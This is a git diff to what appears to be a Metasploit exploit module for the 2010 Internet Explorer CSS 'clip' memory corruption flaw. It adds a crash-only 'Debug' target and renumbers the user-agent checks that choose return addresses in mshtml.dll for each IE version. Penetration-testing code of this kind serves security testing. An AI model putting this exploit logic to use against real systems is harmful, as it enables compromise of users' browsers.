diff --git a/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb
index a87ae79811..7df2a747c7 100644
--- a/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb
+++ b/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb
@@ -82,6 +82,15 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					[ 'Automatic', { } ],
 
+					#
+					# Special target, we put it first so its index doesn't change.
+					#
+					[ 'Debug',
+						{
+							'Ret' => 0x00010101, # tiny spray, sure to crash :)
+						}
+					],
+
 					#
 					# In the targets below, 'Ret' means where EIP ends up (not under our control)
 					#
@@ -101,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'Ret' => 0x7a6902d7, # mshtml.dll 8.00.7600.16385 @ 0x68e40000
 						}
-					],
+					]
 				],
 			'DisclosureDate' => 'Nov 3 2010',
 			'DefaultTarget'  => 0))
@@ -113,11 +122,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		agent = request.headers['User-Agent']
 		#print_status("Checking user agent: #{agent}")
 		if agent =~ /MSIE 6\.0/
-			mytarget = targets[1]   # IE6 on NT, 2000, XP and 2003
+			mytarget = targets[2]   # IE6 on NT, 2000, XP and 2003
 		elsif agent =~ /MSIE 7\.0/
-			mytarget = targets[2]   # IE7 on XP and 2003
+			mytarget = targets[3]   # IE7 on XP and 2003
 		elsif agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 6\.1/
-			mytarget = targets[3]   # IE8 on Windows 7
+			mytarget = targets[4]   # IE8 on Windows 7
 		else
 			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
 		end